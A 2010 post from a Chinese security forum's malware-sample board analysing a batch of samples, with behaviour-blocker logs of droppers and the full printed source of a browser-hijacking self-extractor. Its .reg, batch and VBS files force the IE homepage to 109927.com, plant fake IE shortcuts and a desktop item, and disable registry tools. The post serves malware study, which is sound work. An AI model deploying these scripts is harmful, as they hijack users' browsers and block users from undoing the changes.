收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 4x
123
返回列表 发新帖
楼主: 尤金卡巴斯基
 收起左侧

[病毒样本] 4x

[复制链接]
username
发表于 2010-1-6 12:01:36 | 显示全部楼层
本帖最后由 username 于 2010-1-6 12:06 编辑

old.exe没毒是没毒
但很恶心
不点三次广告不给退出
(结束进程除外

————
2010-1-6 12:02:07    创建文件    允许
进程: d:\emule\4x\123.exe
目标: C:\WINDOWS\system32\00054849.ini
规则: [文件]*

2010-1-6 12:02:08    创建文件    允许
进程: d:\emule\4x\123.exe
目标: C:\WINDOWS\system32\gcmckv.dll
规则: [文件组][A]所有执行文件_ -> [文件]*; *.dll

2010-1-6 12:02:12    创建文件    允许
进程: d:\emule\4x\123.exe
目标: C:\WINDOWS\system32\drivers\gcmckv.sys
规则: [文件组][A]所有执行文件_ -> [文件]*; *.sys

2010-1-6 12:02:14    加载动态链接库    允许
进程: d:\emule\4x\123.exe
目标: c:\windows\system32\gcmckv.dll
规则: [应用程序]*

2010-1-6 12:02:14    安装驱动程序或服务    阻止
进程: d:\emule\4x\123.exe
目标: yxlmhs
文件路径: C:\WINDOWS\system32\svchost.exe -k yxlmhs
规则: [应用程序]*

2010-1-6 12:02:14    修改注册表值    阻止并结束进程
进程: d:\emule\4x\123.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\yxlmhs
值: yxlmhs
规则: [注册表组]自动击杀用 -> [注册表]*\SOFTWARE\Microsoft\window*\CurrentVersion\SvcHost



2010-1-6 12:02:56    创建文件    允许
进程: d:\emule\4x\1339.exe
目标: C:\Program Files\Microsoft Office\SYSTEM\01.exe
规则: [文件组][A]所有执行文件_ -> [文件]*; *.exe

2010-1-6 12:02:56    创建注册表项    阻止
进程: d:\emule\4x\1339.exe
目标: HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Apcdli
规则: [注册表组]系统服务 -> [注册表]*\SYSTEM\*controlset*\Services\*

2010-1-6 12:03:01    创建新进程    允许
进程: d:\emule\4x\1339.exe
目标: c:\program files\microsoft office\system\sysbar.exe
命令行: "C:\Program Files\Microsoft Office\SYSTEM\sysbar.exe"
规则: [应用程序]*

2010-1-6 12:03:12    创建文件夹    阻止
进程: c:\program files\microsoft office\system\sysbar.exe
目标: C:\Documents and Settings\All Users\Application Data\Microsoft\Dr Watson
规则: [文件]*

2010-1-6 12:03:22    修改注册表值    阻止并结束进程
进程: c:\program files\microsoft office\system\sysbar.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
值: http://www1.zhaodao123.com/?h
规则: [注册表组]自动击杀用 -> [注册表]*\Software\Microsoft\Internet explorer\Main; Start Page*


good.exe
自解压包
1.bat
  1. regedit /s 1.reg
复制代码

1.reg
  1. Windows Registry Editor Version 5.00

  3. [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
  4. "Start Page"="http://www.109927.com/?x"

  6. [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
  7. "HomePage"=dword:00000001

  9. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
  10. "{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000001

  12. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
  13. "{871C5380-42A0-1069-A2EA-08002B30309D}"=dword:00000001

  15. [HKEY_CLASSES_ROOT\lnkfile]
  16. "IsShortcut"=-
复制代码

a.bat
  1. copy "Internet Explorer.lnk" "%userprofile%\桌面\Internet  Explorer.lnk" /y
  2. copy "Internet Explorer.url" "C:\WINDOWS\system32\Internet Explorer.url" /y
  3. copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\Internet  Explorer.lnk" /y

  5. copy "Internet Explorer.lnk" "%userprofile%\「开始」菜单\程序\Internet  Explorer.lnk" /y
  6. copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet  Explorer 浏览器.lnk" /y
  7. copy "Internet Explorer.lnk" "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet  Explorer.lnk" /y
复制代码

b.bat
  1. @echo off
  2. del "%userprofile%\桌面\IEXPLORE.lnk"
  3. del "%userprofile%\桌面\IEXPLOREr.lnk"
  4. del "%userprofile%\桌面\Internet Explorer.lnk"
  5. del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Explorer.lnk"
  6. del "%userprofile%\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk"
  7. exit
复制代码

Internet Explorer.lnk
  1. "C:\WINDOWS\system32\Internet Explorer.url"
复制代码

Internet Explorer.url
  1. http://www.109927.com/?x
复制代码

qbgwxowa.vbs
  1. Set WshShell = WScript.CreateObject("WScript.Shell")
  2. strDesktop = WshShell.SpecialFolders("Desktop") :'特殊文件夹“桌面”
  3. Favorites = WshShell.SpecialFolders("Favorites") :'特殊文件夹“桌面”
  4. Rem
  5. RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{871C5380-42A0-1069-A2EA-08002B30309D}"
  6. RegPath1="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\{871C5380-42A0-1069-A2EA-08002B30309D}"
  7. Type_Name="REG_DWORD"
  8. Key_Data=1
  9. WshShell.RegWrite RegPath,Key_Data,Type_Name
  10. WshShell.RegWrite RegPath1,Key_Data,Type_Name
  11. Dim WSHShell, strDesktop
  12. WSHShell.AppActivate strDesktop
  13. WSHShell.SendKeys "{F5}"

  15. strWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")
  16. ie=strWinDir&"\Internet Explorer\iexplore.exe"
  17. winds = WshShell.ExpandEnvironmentStrings("%SystemRoot%")
  18. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}", "Internet Exp1orer"
  19. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\DefaultIcon", ie
  20. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell",""
  21. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\D", "删除(&D)"
  22. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\D\Command", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"
  23. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\Open", "打开主页"
  24. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\Open\Command", ie&" http://www.109927.com/?x"
  25. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\属性", "属性"
  26. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\Shell\属性\Command", "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"
  27. WSHShell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}""", "Internet Explorer"
  28. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\ShellFolder",""
  29. WSHShell.regwrite "HKCR\CLSID\{E2BDE352-AB67-EF4B-8643-A56AE98F5733}\ShellFolder\Attributes",10,"REG_DWORD"
  30. WSHShell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktopCleanupWizard",1,"REG_DWORD"
  31. WSHShell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{93DA0C80-839B-474D-BCA0-0F3FB983C5CC}User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktopCleanupWizard",1,"REG_DWORD"
  32. WSHShell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"


  35. set oUrlLink = WshShell.CreateShortcut("C:\WINDOWS\system32\Internet Explorer.url")
  36. oUrlLink.TargetPath = "http://www.109927.com/?x"
  37. oUrlLink.Save

  39. Set ws = CreateObject("Wscript.Shell")
  40. Set ws1 = CreateObject("Wscript.Shell")
  41. Dim OperationRegistry
  42. Set OperationRegistry=WScript.CreateObject("WScript.Shell")
  43. Dim data1,a9
  44. Data1=OperationRegistry.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
  45. a9=left(Data1,len("http://www.baidu.sina.qq.china.163.youku.gg.109927.com"))
  46. a90=left(Data1,len("http://www.109927.com"))

  48. if a9="http://www.baidu.sina.qq.china.163.youku.gg.109927.com" or a90="http://www.109927.com" then
  49. else
  50. ws.run "cmd /c 1.bat",vbhide
  51. end if

  53. ws1.run "cmd /c a.bat",vbhide
  54. ws1.run "cmd /c b.bat",vbhide
复制代码
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-20 06:09 , Processed in 0.070500 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表